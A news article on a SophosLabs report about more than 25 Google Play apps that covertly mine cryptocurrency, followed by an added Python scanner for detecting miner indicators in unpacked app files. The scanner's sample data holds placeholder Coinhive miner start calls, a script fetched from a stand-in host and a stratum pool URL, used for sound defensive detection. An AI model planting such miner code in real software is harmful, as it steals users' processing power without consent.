More than 25 Android apps found to mine for cryptocoins

Sep 25, 2018 12:07 GMT

As unveiled in a report by SophosLabs' Pankaj Kohli, Google Play is distributing malicious applications that pose as games, educational tools or system utilities but use your Android device to mine for cryptocurrency.

Cryptojacking is still a very lucrative business for threat actors because of the small investment and the vast potential gains, although most crypto coins have gone through a harsh time lately.

It comes as no surprise that bad actors are still trying their hand at targeting Android devices using apps that stealthily mine for cryptocurrency, while also providing the appearance of a legitimate application to avoid detection.

Kohli details in his report how he found that more than 25 apps with more than 120,000 installs distributed through the Google Play store have been secretly mining for crypto coins using stolen processing power.

All these apps will use CPU throttling to make sure that the devices they use for mining don't overheat or become generally unusable, an intelligent move if you're an attacker who wants to avoid detection after compromising a target device.

Most apps have been removed from Google Play, but there are some still available for download

While the vast majority of these malicious Android applications run miner code hosted on coinhive.com, some host the code on their own servers.

This may be an attempt either to fool the automated app analysis tools set up by Google to detect and block cryptojackers from entering the Google Play market, or to keep the apps from being blocked by firewalls or reputation-based services.

Moreover, although most of these apps have already been removed by Google, some, such as LightOn (with 500+ installs), are still available in the store.

Furthermore, even though most of the cryptojacking apps spotted by Kohli in the Google Play market mine for Monero, there are exceptions. The prime example is "A Paintbox for Kids" by Uwe Post, which is capable of mining for various coins using the open source XMRig miner.

Kohli's report also says that Google was notified in August about the presence of these new cryptocurrency mining apps in the official Android app store, but it seems that the Mountain View company is taking its sweet time in closely looking into each of them.
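An added example, not taken from the SophosLabs report or from this article: a small static check over text files extracted from an app package, showing why self-hosted miner code slips past a filter that only looks for coinhive.com while content indicators (the Coinhive JavaScript API call, its throttle option, a stratum pool URL) still match. All file names, the site key and the hosts below are constructed placeholders.

```python
import re

DOMAIN = re.compile(r"coinhive\.com", re.I)              # what a domain filter sees
API = re.compile(r"\bCoinHive\.(?:Anonymous|User)\s*\(")  # Coinhive JS miner API
THROTTLE = re.compile(r"\bthrottle\s*:\s*(\d*\.?\d+)")    # CPU throttling option
STRATUM = re.compile(r"stratum\+(?:tcp|ssl)://", re.I)    # native miner pool URL

# Constructed sample: text assets as they might look after unpacking an APK.
SAMPLE = {
    "assets/game.html":
        '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
        "<script>new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER',"
        "{throttle: 0.5}).start();</script>",
    "assets/tutor.html":  # same API, library served from the author's own host
        '<script src="https://cdn.example.invalid/lib/m.js"></script>'
        "<script>new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER',"
        "{throttle: 0.7}).start();</script>",
    "assets/config.json": '{"url": "stratum+tcp://pool.example.invalid:3333"}',
    "assets/help.html": "<h1>How to play</h1><p>Tap to paint.</p>",
}

def scan(files):
    """Map each path to a sorted list of miner indicators found in its text."""
    report = {}
    for path, text in files.items():
        tags = set()
        if DOMAIN.search(text):
            tags.add("coinhive-domain")
        if API.search(text):
            tags.add("coinhive-api")
            m = THROTTLE.search(text)
            if m:  # only meaningful next to the miner constructor
                tags.add("cpu-throttle=" + m.group(1))
        if STRATUM.search(text):
            tags.add("stratum-pool-url")
        if tags:
            report[path] = sorted(tags)
    return report

def missed_by_domain_filter(report):
    """Flagged paths that never mention coinhive.com (the self-hosted case)."""
    return sorted(p for p, t in report.items() if "coinhive-domain" not in t)

if __name__ == "__main__":
    result = scan(SAMPLE)
    for path, tags in sorted(result.items()):
        print(path, tags)
    print("domain-only filter would miss:", missed_by_domain_filter(result))
```
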

[Images: The 25 cryptojacking apps; Coinhive and XMRig mining code]